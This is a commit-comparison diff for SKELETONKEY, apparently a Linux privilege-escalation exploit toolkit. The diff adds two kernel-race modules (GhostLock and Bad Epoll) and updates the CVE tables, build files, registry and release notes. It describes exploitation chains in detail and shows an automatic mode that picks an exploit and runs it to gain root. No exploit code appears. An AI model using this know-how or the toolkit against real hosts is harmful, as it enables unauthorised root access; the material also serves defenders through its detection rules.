Compare commits
5 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| d466fbfdcb | |||
| a8bc81c54c | |||
| b7027a1749 | |||
| 03324c8542 | |||
| 95589e26cb |
@@ -23,16 +23,18 @@ Status legend:
|
||||
- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
|
||||
historical reference only
|
||||
|
||||
**Counts:** 43 modules total covering 38 CVEs; **28 of 38 CVEs
|
||||
**Counts:** 45 modules total covering 40 CVEs; **28 of 40 CVEs
|
||||
verified end-to-end in real VMs** via `tools/verify-vm/`. 🔵 0 · ⚪ 0
|
||||
planned-with-stub · 🔴 0. (One ⚪ row below — CVE-2026-31402 — is a
|
||||
*candidate* with no module, not counted as a module.)
|
||||
|
||||
> **Note on unverified rows:** `vmwgfx` / `dirty_cow` /
|
||||
> `mutagen_astronomy` / `pintheft` / `vsock_uaf` / `fragnesia` /
|
||||
> `ptrace_pidfd` / `sudo_host` / `cifswitch` / `nft_catchall` are blocked by their target environment (VMware-only,
|
||||
> `ptrace_pidfd` / `sudo_host` / `cifswitch` / `nft_catchall` / `bad_epoll` / `ghostlock` are blocked by their target environment (VMware-only,
|
||||
> kernel < 4.4, mainline panic, kmod not autoloaded, t64-transition
|
||||
> libs) or are brand-new this cycle, not by missing code. See
|
||||
> libs) or are brand-new this cycle, not by missing code (`bad_epoll` and
|
||||
> `ghostlock` are reconstructed race triggers — deliberately under-driven
|
||||
> and not VM-verified). See
|
||||
> [`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml).
|
||||
>
|
||||
> All three now have **pinned fix commits and version-based
|
||||
@@ -97,6 +99,8 @@ root on a host can upstream their kernel's offsets via PR.
|
||||
| CVE-2025-32462 | sudo `-h`/`--host` policy bypass (Stratascale) | LPE (userspace; abuse a host-restricted sudoers rule for local root) | sudo 1.9.17p1 (2025-06-30) | `sudo_host` | 🟢 | **Stratascale CRU disclosure (Rich Mirch); sibling of `sudo_chwoot`.** sudo's `-h`/`--host` option — meant only to pair with `-l` — was honored when running a command, so a sudoers rule scoped to a host other than the current machine (and not ALL) is usable via `sudo -h <host> <cmd>`. Affects sudo 1.8.8 → 1.9.17p0; fixed 1.9.17p1. CWE-863, CVSS 8.8; not in KEV. detect() version-gates; exploit() finds an abusable host-restricted rule in readable sudoers (or `SKELETONKEY_SUDO_HOST`), witnesses with `sudo -n -h <host> id -u`, and pops a root shell only on a uid-0 witness — never fabricates root. Structural (no offsets/race); arch-agnostic. Most relevant to fleet-wide / LDAP / SSSD sudoers. Credit: Rich Mirch / Stratascale. |
|
||||
| CVE-2026-46243 | CIFSwitch — `cifs.spnego` key type trusts userspace-forged authority fields | LPE (coerce root `cifs.upcall` into loading an attacker NSS module) | fixed 5.10.257 / 6.1.174 / 6.12.90 / 7.0.10 (Debian backports of `3da1fdf4efbc`, mainline 7.1-rc5) | `cifswitch` | 🟡 | **Asim Manizada disclosure (2026-05-28), public PoC; detect() + add_key primitive VM-verified on Ubuntu 24.04 / 6.8.0-117 (QEMU/HVF, 2026-06-08), full chain + patched-kernel discriminator pending.** ~19-year-old logic flaw in `fs/smb/client/cifs_spnego.c`: the `cifs.spnego` key description carries authority-bearing fields (`pid`/`uid`/`creduid`/`upcall_target`) that root `cifs.upcall` trusts as kernel-originating, but userspace can create such keys via `add_key(2)`/`request_key(2)`. With user+mount namespace tricks, an unprivileged user makes `cifs.upcall` load a malicious NSS `.so` as root. CWE-20; not in KEV. Preconditions: `cifs` module + `cifs-utils` (`cifs.upcall`) + `cifs.spnego` request-key rule (override the probe via `SKELETONKEY_CIFS_ASSUME_PRESENT=1/0`). detect() version-gates and PRECOND_FAILs when the cifs userspace path is absent. exploit() fires only the non-destructive primitive — `add_key(2)` of a forged-but-benign `cifs.spnego` key (no upcall, loads nothing), revoked immediately — and returns honest `EXPLOIT_FAIL` without a euid-0 witness; the namespace+NSS root-pop is not bundled until VM-verified. Structural; arch-agnostic. `--mitigate` blocklists the `cifs` module; `--cleanup` reverts. Credit: Asim Manizada. |
|
||||
| CVE-2026-23111 | nf_tables `nft_map_catchall_activate` abort-path UAF (inverted `!`) | LPE (unprivileged userns + nftables → chain UAF → kernel R/W → root) | fixed 6.1.164 / 6.12.73 / 6.18.10 (Debian backports of `f41c5d1`); 5.10 branch still unfixed | `nft_catchall` | 🟡 | **Public reproduction + analysis by FuzzingLabs; reported via the kernel security process. Reconstructed trigger, not yet VM-verified.** A stray `!` in `nft_map_catchall_activate()` makes the transaction-abort path process *active* catch-all map elements instead of skipping them; a catch-all GOTO element drives a chain's use-count to zero so a following DELCHAIN frees it while still referenced → UAF, escalatable via modprobe_path/selinux_state ROP. CWE-416, CVSS 7.8; not in KEV. One more UAF in the corpus's most-covered subsystem; shipped on the same contract as `nf_tables` (CVE-2024-1086). detect() version-gates (catch-all elems arrived ~5.13) AND requires unprivileged user_ns clone (else PRECOND_FAIL). exploit() forks an isolated child that builds a verdict map with a catch-all GOTO element and provokes an aborting batch to drive the abort-path UAF, observes slabinfo, and returns `EXPLOIT_FAIL` — the per-kernel leak + R/W + ROP root-pop is NOT bundled and the trigger is reconstructed from public analysis, not VM-verified. x86_64. Mitigate: upgrade, or `kernel.unprivileged_userns_clone=0`. Credit: FuzzingLabs (public repro) + upstream fix `f41c5d1`. |
|
||||
| CVE-2026-43499 | GhostLock — rtmutex/futex requeue-PI `remove_waiter()` stack UAF | LPE (unprivileged, **no userns** → kernel-**stack** UAF → near-arbitrary write → root) | fixed 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175 (CNA/Debian backports of `3bfdc63936dd`, mainline 7.1-rc1); 5.15/5.10/5.4/4.19 affected with no upstream fix | `ghostlock` | 🟡 | **VEGA / Nebula Security public PoC ("IonStack part II: GhostLock"); reconstructed trigger, not VM-verified.** ~15-year stack UAF in `kernel/locking/rtmutex.c`: on the `-EDEADLK` deadlock-rollback, `remove_waiter()` runs against `current` instead of the waiter task, so a concurrent PI-chain priority walk (driven via `sched_setattr()` on a sibling CPU) clears `pi_blocked_on` on the wrong task and leaves an on-stack `rt_mutex_waiter` dangling → controlled kernel write when the rbtree is later rotated over the reused frame; weaponised (Android/Pixel) via a KernelSnitch page leak → forged waiter → `struct file` `f_op` → configfs/ashmem R/W → pipe physical R/W → cred patch. Reachable by **any unprivileged user** (CVSS 7.8, PR:L) — plain `futex(2)` + `sched_setattr(2)`, no userns, no capability, only `CONFIG_FUTEX_PI` (universal). CWE-416 (race root cause CWE-362); not in KEV. The corpus's first rtmutex/futex-PI module and its only kernel-**stack** UAF (all others are heap/slab). detect() is a **pure version gate** across a five-branch backport table. exploit() forks a child that (A) deterministically confirms the `-EDEADLK` `remove_waiter()` rollback path is reachable (safe — validated on real hardware) and (B) exercises the actual race a hard-bounded 24 iterations / 2 s with a sibling-CPU `sched_setattr(SCHED_BATCH)` storm — **deliberately under-driven**: no `copy_from_user` widening, no stack-frame spray/reoccupation, and the KernelSnitch leak + R/W + cred-patch chain is NOT bundled (Android/Pixel-specific, per-build offsets). Returns `EXPLOIT_FAIL`. **Lowest `--auto` safety rank (11)** — a won race corrupts the kernel stack. Unlike most races it has a real detection signature (futex requeue-PI returning `EDEADLK` + sibling `sched_setattr(SCHED_BATCH)`); auditd/sigma anchor on `sched_setattr`, falco/eBPF on the requeue-PI-EDEADLK tell; no yara. Arch-neutral trigger (any). Mitigate: upgrade only. Credit: VEGA / Nebula Security. |
|
||||
| CVE-2026-46242 | Bad Epoll — epoll `ep_remove`/`__fput` teardown race UAF | LPE (unprivileged, **no userns** → cross-cache to `struct file` → kernel R/W → root) | introduced 6.4 (`58c9b016e128`); fixed `a6dc643c6931` (7.1-rc1), stable backport 7.0.13; 6.6/6.12 LTS backports pending; 6.1 and older not affected | `bad_epoll` | 🟡 | **Jaeyoung Chung (`J-jaeyoung`) kernelCTF public PoC; reconstructed trigger, not VM-verified.** Race UAF in `fs/eventpoll.c`: `ep_remove()` clears `file->f_ep` under `f_lock` but keeps using the file (`hlist_del_rcu` + unlock) while a concurrent `__fput()` frees the still-referenced `struct eventpoll` → 8-byte UAF write, weaponised via cross-cache to a `struct file`, `/proc/self/fdinfo` arbitrary read, ROP. Reachable by **any unprivileged user** — no userns, no CONFIG, no capability; there is **no unprivileged-userns stopgap**, only patching. CWE-416 (race root cause CWE-362); not in KEV. The corpus's first epoll / VFS-teardown module and cleanest SMP race. detect() is a **pure version gate** (no active probe — you cannot safely distinguish vulnerable from patched without winning the race). exploit() forks a CPU-pinned child that builds the epoll race pair and exercises the concurrent-close window a hard-bounded 48 attempts / 2s — **deliberately under-driven** because a won race frees a live struct file and rarely trips KASAN (silent-corruption risk) — snapshots the eventpoll slab, and returns `EXPLOIT_FAIL`; the cross-cache reclaim + fdinfo R/W + ROP are NOT bundled. Detection is intentionally weak/structural (epoll syscalls are ubiquitous) — rules key on the post-exploitation euid-0 transition; no yara. **Lowest `--auto` safety rank (12).** x86_64. Mitigate: upgrade only. Credit: Jaeyoung Chung. |
|
||||
|
||||
## Operations supported per module
|
||||
|
||||
|
||||
@@ -242,6 +242,16 @@ NCA_DIR := modules/nft_catchall_cve_2026_23111
|
||||
NCA_SRCS := $(NCA_DIR)/skeletonkey_modules.c
|
||||
NCA_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NCA_SRCS))
|
||||
|
||||
# CVE-2026-46242 bad_epoll — epoll ep_remove-vs-__fput teardown race UAF ("Bad Epoll", J-jaeyoung kernelCTF)
|
||||
BEP_DIR := modules/bad_epoll_cve_2026_46242
|
||||
BEP_SRCS := $(BEP_DIR)/skeletonkey_modules.c
|
||||
BEP_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(BEP_SRCS))
|
||||
|
||||
# CVE-2026-43499 ghostlock — rtmutex/futex requeue-PI remove_waiter() stack UAF ("GhostLock", VEGA / Nebula Security)
|
||||
GHL_DIR := modules/ghostlock_cve_2026_43499
|
||||
GHL_SRCS := $(GHL_DIR)/skeletonkey_modules.c
|
||||
GHL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(GHL_SRCS))
|
||||
|
||||
# Top-level dispatcher
|
||||
TOP_OBJ := $(BUILD)/skeletonkey.o
|
||||
|
||||
@@ -255,7 +265,8 @@ MODULE_OBJS := $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) \
|
||||
$(DDC_OBJS) $(FGN_OBJS) $(P2TR_OBJS) \
|
||||
$(SCHW_OBJS) $(UDB_OBJS) $(PTH_OBJS) \
|
||||
$(MUT_OBJS) $(SRN_OBJS) $(TIO_OBJS) $(VSK_OBJS) $(PIP_OBJS) \
|
||||
$(PPF_OBJS) $(SUH_OBJS) $(CIW_OBJS) $(NCA_OBJS)
|
||||
$(PPF_OBJS) $(SUH_OBJS) $(CIW_OBJS) $(NCA_OBJS) $(BEP_OBJS) \
|
||||
$(GHL_OBJS)
|
||||
|
||||
ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(REGISTRY_ALL_OBJ) $(MODULE_OBJS)
|
||||
|
||||
|
||||
@@ -2,10 +2,10 @@
|
||||
|
||||
[](https://github.com/KaraZajac/SKELETONKEY/releases/latest)
|
||||
[](LICENSE)
|
||||
[](docs/VERIFICATIONS.jsonl)
|
||||
[](docs/VERIFICATIONS.jsonl)
|
||||
[](#)
|
||||
|
||||
> **One curated binary. 43 Linux LPE modules covering 38 CVEs from 2016 → 2026.
|
||||
> **One curated binary. 45 Linux LPE modules covering 40 CVEs from 2016 → 2026.
|
||||
> Every year 2016 → 2026 covered. 28 confirmed end-to-end against real Linux
|
||||
> VMs via `tools/verify-vm/`. Detection rules in the box. One command picks
|
||||
> the safest one and runs it.**
|
||||
@@ -45,9 +45,9 @@ for every CVE in the bundle — same project for red and blue teams.
|
||||
|
||||
## Corpus at a glance
|
||||
|
||||
**43 modules covering 38 distinct CVEs** across the 2016 → 2026 LPE
|
||||
timeline. **28 of the 38 CVEs have been empirically verified** in real
|
||||
Linux VMs via `tools/verify-vm/`; the 8 still-pending entries are
|
||||
**45 modules covering 40 distinct CVEs** across the 2016 → 2026 LPE
|
||||
timeline. **28 of the 40 CVEs have been empirically verified** in real
|
||||
Linux VMs via `tools/verify-vm/`; the 12 still-pending entries are
|
||||
blocked by their target environment (legacy hypervisor, EOL kernel, or
|
||||
the t64-transition libc rollout) or are brand-new additions awaiting a
|
||||
VM sweep, not by missing code.
|
||||
@@ -68,7 +68,7 @@ af_packet · af_packet2 · af_unix_gc · cls_route4 · fuse_legacy ·
|
||||
nf_tables · nft_set_uaf · nft_fwd_dup · nft_payload ·
|
||||
netfilter_xtcompat · stackrot · sudo_samedit · sequoia · vmwgfx
|
||||
|
||||
### Empirical verification (28 of 38 CVEs)
|
||||
### Empirical verification (28 of 40 CVEs)
|
||||
|
||||
Records in [`docs/VERIFICATIONS.jsonl`](docs/VERIFICATIONS.jsonl) prove
|
||||
each verdict against a known-target VM. Coverage:
|
||||
@@ -81,7 +81,7 @@ each verdict against a known-target VM. Coverage:
|
||||
| Debian 11 (5.10 stock) | cgroup_release_agent · fuse_legacy · netfilter_xtcompat · nft_fwd_dup |
|
||||
| Debian 12 (6.1 stock + udisks2 / polkit allow rule) | pack2theroot · udisks_libblockdev |
|
||||
|
||||
**Not yet verified (8):** `vmwgfx` (VMware-guest-only — no public Vagrant
|
||||
**Not yet verified (12):** `vmwgfx` (VMware-guest-only — no public Vagrant
|
||||
box), `dirty_cow` (needs ≤ 4.4 kernel — older than every supported box),
|
||||
`mutagen_astronomy` (mainline 4.14.70 kernel-panics on Ubuntu 18.04
|
||||
rootfs — needs CentOS 6 / Debian 7), `pintheft` & `vsock_uaf` (kernel
|
||||
@@ -90,7 +90,13 @@ kernel .debs depend on the t64-transition libs from Ubuntu 24.04+/Debian
|
||||
13+; no Parallels-supported box has those yet), `ptrace_pidfd` (brand-new
|
||||
2026-05 Qualys disclosure — added this cycle, VM sweep pending), `sudo_host`
|
||||
(brand-new 2025-06 Stratascale disclosure — added this cycle, VM sweep
|
||||
pending). All eight are flagged in
|
||||
pending), `cifswitch` (detect + `add_key` primitive VM-verified; full chain
|
||||
+ patched-kernel discriminator pending), `nft_catchall` (reconstructed
|
||||
kernel-UAF trigger, not VM-verified), `bad_epoll` (reconstructed epoll
|
||||
race trigger — deliberately under-driven, not VM-verified), `ghostlock`
|
||||
(reconstructed rtmutex/futex-PI stack-UAF trigger — deliberately
|
||||
under-driven, not VM-verified). All twelve are
|
||||
flagged in
|
||||
[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml) with rationale.
|
||||
|
||||
See [`CVES.md`](CVES.md) for per-module CVE, kernel range, and
|
||||
@@ -137,7 +143,7 @@ uid=1000(kara) gid=1000(kara) groups=1000(kara)
|
||||
$ skeletonkey --auto --i-know
|
||||
[*] auto: host=demo distro=ubuntu/24.04 kernel=5.15.0-56-generic arch=x86_64
|
||||
[*] auto: active probes enabled — brief /tmp file touches and fork-isolated namespace probes
|
||||
[*] auto: scanning 43 modules for vulnerabilities...
|
||||
[*] auto: scanning 45 modules for vulnerabilities...
|
||||
[+] auto: dirty_pipe VULNERABLE (safety rank 90)
|
||||
[+] auto: cgroup_release_agent VULNERABLE (safety rank 98)
|
||||
[+] auto: pwnkit VULNERABLE (safety rank 100)
|
||||
@@ -206,16 +212,24 @@ also compile (modules with Linux-only headers stub out gracefully).
|
||||
|
||||
## Status
|
||||
|
||||
**v0.9.11 cut 2026-06-08.** 43 modules across 38 CVEs — **every
|
||||
year 2016 → 2026 now covered**. Newest: `nft_catchall` (CVE-2026-23111,
|
||||
the nf_tables `nft_map_catchall_activate` abort-path UAF — an inverted
|
||||
condition frees a chain still referenced by a catch-all GOTO map element;
|
||||
public reproduction by FuzzingLabs), `cifswitch` (CVE-2026-46243,
|
||||
Asim Manizada's "CIFSwitch" — the `cifs.spnego` key type trusts
|
||||
userspace-forged authority fields, coercing the root `cifs.upcall` helper
|
||||
into loading an attacker NSS module as root), and `ptrace_pidfd`
|
||||
(CVE-2026-46333, Qualys's `__ptrace_may_access` / `pidfd_getfd`
|
||||
credential-steal).
|
||||
**v0.9.13 cut 2026-07-13.** 45 modules across 40 CVEs — **every
|
||||
year 2016 → 2026 now covered**. Newest: `ghostlock` (CVE-2026-43499,
|
||||
VEGA / Nebula Security's "GhostLock" — a ~15-year rtmutex/futex requeue-PI
|
||||
use-after-free on **kernel stack** memory where `remove_waiter()` clears
|
||||
`pi_blocked_on` on the wrong task during the `-EDEADLK` deadlock-rollback,
|
||||
raced by a sibling-CPU `sched_setattr()` priority walk; reachable by **any
|
||||
unprivileged user with no user namespace**; VEGA / Nebula kernelCTF public
|
||||
PoC ($92k, ~97% stable) — shipped as a deliberately under-driven,
|
||||
reconstructed trigger anchored on a safe `-EDEADLK` reachability witness
|
||||
with the corpus's lowest `--auto` safety rank), `bad_epoll` (CVE-2026-46242,
|
||||
Jaeyoung Chung's "Bad Epoll" — a race UAF in `fs/eventpoll.c` reachable by
|
||||
any unprivileged user with no user namespace; kernelCTF public PoC),
|
||||
`nft_catchall` (CVE-2026-23111, the nf_tables `nft_map_catchall_activate`
|
||||
abort-path UAF — an inverted condition frees a chain still referenced by a
|
||||
catch-all GOTO map element; public reproduction by FuzzingLabs), and
|
||||
`cifswitch` (CVE-2026-46243, Asim Manizada's "CIFSwitch" — the
|
||||
`cifs.spnego` key type trusts userspace-forged authority fields, coercing
|
||||
the root `cifs.upcall` helper into loading an attacker NSS module as root).
|
||||
v0.9.0 added 5 gap-fillers
|
||||
(`mutagen_astronomy` / `sudo_runas_neg1` / `tioscpgrp` / `vsock_uaf` /
|
||||
`nft_pipapo`); v0.8.0 added 3 (`sudo_chwoot` / `udisks_libblockdev` /
|
||||
@@ -245,13 +259,13 @@ Reliability + accuracy work in v0.7.x:
|
||||
trace, OPSEC footprint, detection-rule coverage, verified-on
|
||||
records. Paste-into-ticket ready.
|
||||
- **CVE metadata pipeline** (`tools/refresh-cve-metadata.py`) — fetches
|
||||
CISA KEV catalog + NVD CWE; 13 of 38 modules cover KEV-listed CVEs.
|
||||
CISA KEV catalog + NVD CWE; 13 of 40 modules cover KEV-listed CVEs.
|
||||
- **151 detection rules** across auditd / sigma / yara / falco; one
|
||||
command exports the corpus to your SIEM.
|
||||
- `--auto` upgrades: per-detect 15s timeout, fork-isolated detect +
|
||||
exploit, structured verdict table, scan summary, `--dry-run`.
|
||||
|
||||
Not yet verified (10 of 38 CVEs): `vmwgfx` (VMware-guest only),
|
||||
Not yet verified (12 of 40 CVEs): `vmwgfx` (VMware-guest only),
|
||||
`dirty_cow` (needs ≤ 4.4 kernel), `mutagen_astronomy` (mainline
|
||||
4.14.70 panics on Ubuntu 18.04 rootfs — needs CentOS 6 / Debian 7),
|
||||
`pintheft` + `vsock_uaf` (kernel modules not autoloaded on common
|
||||
@@ -259,6 +273,9 @@ Vagrant boxes), `fragnesia` (mainline 7.0.5 .debs need t64-transition
|
||||
libs from Ubuntu 24.04+ / Debian 13+), `ptrace_pidfd` + `sudo_host`
|
||||
+ `cifswitch` (cifswitch detect + primitive VM-verified; full chain
|
||||
pending) + `nft_catchall` (reconstructed kernel-UAF trigger, not
|
||||
VM-verified) + `bad_epoll` (reconstructed epoll race trigger,
|
||||
deliberately under-driven, not VM-verified) + `ghostlock` (reconstructed
|
||||
rtmutex/futex-PI stack-UAF trigger, deliberately under-driven, not
|
||||
VM-verified). Rationale in
|
||||
[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml).
|
||||
|
||||
|
||||
@@ -292,6 +292,22 @@ const struct cve_metadata cve_metadata_table[] = {
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-43499",
|
||||
.cwe = "CWE-416",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-46242",
|
||||
.cwe = "CWE-416",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-46243",
|
||||
.cwe = "CWE-20",
|
||||
|
||||
@@ -59,6 +59,8 @@ void skeletonkey_register_ptrace_pidfd(void);
|
||||
void skeletonkey_register_sudo_host(void);
|
||||
void skeletonkey_register_cifswitch(void);
|
||||
void skeletonkey_register_nft_catchall(void);
|
||||
void skeletonkey_register_bad_epoll(void);
|
||||
void skeletonkey_register_ghostlock(void);
|
||||
|
||||
/* Call every skeletonkey_register_<family>() above in canonical order.
|
||||
* Single source of truth so the main binary and the test binary stay
|
||||
|
||||
@@ -55,4 +55,6 @@ void skeletonkey_register_all_modules(void)
|
||||
skeletonkey_register_sudo_host();
|
||||
skeletonkey_register_cifswitch();
|
||||
skeletonkey_register_nft_catchall();
|
||||
skeletonkey_register_bad_epoll();
|
||||
skeletonkey_register_ghostlock();
|
||||
}
|
||||
|
||||
@@ -314,6 +314,24 @@
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-43499",
|
||||
"module_dir": "ghostlock_cve_2026_43499",
|
||||
"cwe": "CWE-416",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-46242",
|
||||
"module_dir": "bad_epoll_cve_2026_46242",
|
||||
"cwe": "CWE-416",
|
||||
"attack_technique": "T1068",
|
||||
"attack_subtechnique": null,
|
||||
"in_kev": false,
|
||||
"kev_date_added": ""
|
||||
},
|
||||
{
|
||||
"cve": "CVE-2026-46243",
|
||||
"module_dir": "cifswitch_cve_2026_46243",
|
||||
|
||||
@@ -4,7 +4,7 @@ Which SKELETONKEY modules cover CVEs that CISA has observed exploited
|
||||
in the wild per the Known Exploited Vulnerabilities catalog.
|
||||
Refreshed via `tools/refresh-cve-metadata.py`.
|
||||
|
||||
**13 of 38 modules cover KEV-listed CVEs.**
|
||||
**13 of 40 modules cover KEV-listed CVEs.**
|
||||
|
||||
## In KEV (prioritize patching)
|
||||
|
||||
@@ -54,6 +54,8 @@ and are technically reachable. "Not in KEV" is not the same as
|
||||
| CVE-2026-31635 | CWE-130 | `dirtydecrypt_cve_2026_31635` |
|
||||
| CVE-2026-41651 | CWE-367 | `pack2theroot_cve_2026_41651` |
|
||||
| CVE-2026-43494 | ? | `pintheft_cve_2026_43494` |
|
||||
| CVE-2026-43499 | CWE-416 | `ghostlock_cve_2026_43499` |
|
||||
| CVE-2026-46242 | CWE-416 | `bad_epoll_cve_2026_46242` |
|
||||
| CVE-2026-46243 | CWE-20 | `cifswitch_cve_2026_46243` |
|
||||
| CVE-2026-46300 | CWE-787 | `fragnesia_cve_2026_46300` |
|
||||
| CVE-2026-46333 | CWE-269 | `ptrace_pidfd_cve_2026_46333` |
|
||||
|
||||
@@ -1,3 +1,105 @@
|
||||
## SKELETONKEY v0.9.13 — new LPE module: ghostlock (CVE-2026-43499)
|
||||
|
||||
Adds **`ghostlock` — CVE-2026-43499 "GhostLock"** (VEGA / Nebula Security,
|
||||
"IonStack part II"), taking the corpus to **45 modules / 40 CVEs** and opening a
|
||||
brand-new subsystem: **rtmutex / futex requeue-PI** (`kernel/locking/rtmutex.c`).
|
||||
It is also the corpus's first kernel-**stack** use-after-free — every other UAF
|
||||
in the set is heap/slab. On the `-EDEADLK` deadlock-rollback path,
|
||||
`remove_waiter()` operates on `current` instead of the actual waiter task while
|
||||
unwinding a proxy lock in `rt_mutex_start_proxy_lock()` (reached from
|
||||
`futex_requeue()`); if a concurrent PI-chain priority walk — driven from another
|
||||
CPU via `sched_setattr()` — runs at that instant, `pi_blocked_on` is cleared on
|
||||
the wrong task and an on-stack `rt_mutex_waiter` is left dangling, becoming a
|
||||
controlled kernel write when the rbtree is later rotated over the reused frame.
|
||||
Reachable by **any unprivileged user** (CVSS 7.8, PR:L) — plain `futex(2)` +
|
||||
`sched_setattr(2)`, no user namespace, no capability, only `CONFIG_FUTEX_PI`
|
||||
(universal). It has existed since PI-futex requeue landed in **2.6.39** — ~15
|
||||
years across every distribution. The public exploit weaponises it (Android/Pixel)
|
||||
via a "KernelSnitch" futex-bucket page leak → forged waiter → `struct file`
|
||||
`f_op` → configfs/ashmem R/W → pipe physical R/W → cred patch; ~97% stable on
|
||||
kernelCTF, $92,337. Introduced 2.6.39; fixed `3bfdc63936dd` (merged 7.1-rc1),
|
||||
stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175 — the
|
||||
5.15/5.10/5.4/4.19 LTS branches are affected with no upstream fix. CWE-416 (race
|
||||
root cause CWE-362); not in CISA KEV.
|
||||
|
||||
🟡 **Trigger (reconstructed) — reachability-only, deliberately under-driven, not
|
||||
VM-verified.** `detect()` is a pure kernel-version gate over a five-branch
|
||||
backport table (7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175, 7.1+ inherits
|
||||
mainline; 5.15/5.10/5.4/4.19 affected with no fix; < 2.6.39 not affected) — no
|
||||
userns/CONFIG probe (`CONFIG_FUTEX_PI` assumed). `exploit()` forks an isolated
|
||||
child that **(A)** deterministically confirms the `-EDEADLK` `remove_waiter()`
|
||||
rollback path is reachable — a **safe** witness, since without a concurrent
|
||||
priority walk the unwind creates no dangling pointer (validated on real hardware:
|
||||
the requeue-PI cycle returns `-EDEADLK` reliably) — then **(B)** exercises the
|
||||
actual race a hard-bounded 24 iterations / 2 s with a sibling-CPU
|
||||
`sched_setattr(SCHED_BATCH)` storm, and stops. It does **not** widen the
|
||||
`copy_from_user` window (no memfd/`PUNCH_HOLE`), does **not** spray or reoccupy
|
||||
the freed stack frame, and does **not** bundle the KernelSnitch leak →
|
||||
forged-waiter → fops/configfs/ashmem/pipe R/W → cred-patch chain (Android/Pixel-
|
||||
specific, per-build offsets). Returns `EXPLOIT_FAIL`. It carries the corpus's
|
||||
**lowest `--auto` safety rank (11)** — a won race corrupts the kernel stack and
|
||||
drives a near-arbitrary pointer write (near-certain panic), so `--auto` only
|
||||
reaches for it after every safer vulnerable module. Unlike most kernel races
|
||||
GhostLock has a **real detection signature**: a futex requeue-PI op returning
|
||||
`-EDEADLK` (glibc never provokes this) plus tight-loop
|
||||
`sched_setattr(SCHED_BATCH)` on a sibling thread — the shipped auditd/sigma rules
|
||||
anchor on `sched_setattr` + the post-exploitation euid-0 transition, the
|
||||
falco/eBPF rule on the requeue-PI-EDEADLK tell; no yara. Wired: registry,
|
||||
Makefile, safety rank (11), 9 `detect()` test rows (incl. the multi-branch
|
||||
"newer than all" case 6.13.0 → VULNERABLE), CVE metadata (CWE-416 / T1068 /
|
||||
not-KEV), README + CVES.md + website counts (45/40), RELEASE_NOTES v0.9.13, and a
|
||||
verify-vm target (sweep pending). Also corrects pre-existing website drift left
|
||||
by v0.9.12 (index.html body counts + the missing `bad_epoll` corpus pill).
|
||||
Credits VEGA / Nebula Security + the upstream fix `3bfdc63936dd`.
|
||||
|
||||
## SKELETONKEY v0.9.12 — new LPE module: bad_epoll (CVE-2026-46242)
|
||||
|
||||
Adds **`bad_epoll` — CVE-2026-46242 "Bad Epoll"** (Jaeyoung Chung /
|
||||
`J-jaeyoung`, submitted to Google's kernelCTF), taking the corpus to **44
|
||||
modules / 39 CVEs** and opening a brand-new subsystem: **epoll /
|
||||
`fs/eventpoll.c`**. A race-condition use-after-free on the file-teardown
|
||||
path — `ep_remove()` clears `file->f_ep` under `file->f_lock` but keeps
|
||||
using the file inside the critical section (`hlist_del_rcu()` +
|
||||
`spin_unlock()`), so a concurrent `__fput()` observes the transient NULL,
|
||||
skips `eventpoll_release_file()`, and frees a `struct eventpoll` still in
|
||||
use. The public exploit weaponises the 8-byte UAF write via a cross-cache
|
||||
attack to a `struct file`, arbitrary kernel read through
|
||||
`/proc/self/fdinfo`, and a ROP chain — ~99% reliable through a
|
||||
~6-instruction window, and reachable by **any unprivileged user with no
|
||||
user namespace, no CONFIG, and no capability** (which also means there is
|
||||
no unprivileged-userns stopgap — the only fix is to patch). Introduced by
|
||||
`58c9b016e128` (Linux 6.4); fixed by `a6dc643c6931` (merged 7.1-rc1),
|
||||
stable backport 7.0.13. CWE-416 (race root cause CWE-362); not in CISA
|
||||
KEV. Also affects Android.
|
||||
|
||||
🟡 **Trigger (reconstructed) — deliberately under-driven, primitive-only,
|
||||
not VM-verified.** A *won* race frees a live `struct eventpoll` — real
|
||||
memory corruption that rarely trips KASAN, so a completed race can
|
||||
silently destabilise a vulnerable host. `detect()` is therefore a pure
|
||||
kernel-version gate (vulnerable iff ≥ 6.4 and below the fix on-branch;
|
||||
stable backport 7.0.13, 7.1+ inherits; 6.1/5.10 not affected) with **no
|
||||
active probe** — there is no safe way to distinguish vulnerable from
|
||||
patched without winning the race. `exploit()` forks a CPU-pinned child
|
||||
that builds the epoll race pair and exercises the `ep_remove`-vs-`__fput`
|
||||
concurrent-close window a **hard-bounded** 48 attempts / 2 s (widened with
|
||||
`close(dup())` false-sharing storms), snapshots the eventpoll slab, and
|
||||
returns `EXPLOIT_FAIL`; it does not grind the race to a win, does not do
|
||||
the cross-cache reclaim, and does not bundle the `fdinfo` arbitrary-read +
|
||||
ROP root-pop (per-build offsets refused). It carries the corpus's
|
||||
**lowest `--auto` safety rank (12)** — a kernel race that frees a live
|
||||
`struct file` is the least predictable class, so `--auto` only reaches for
|
||||
it after every safer vulnerable module. Detection is intentionally
|
||||
weak/structural (epoll syscalls are ubiquitous and the exploit rarely
|
||||
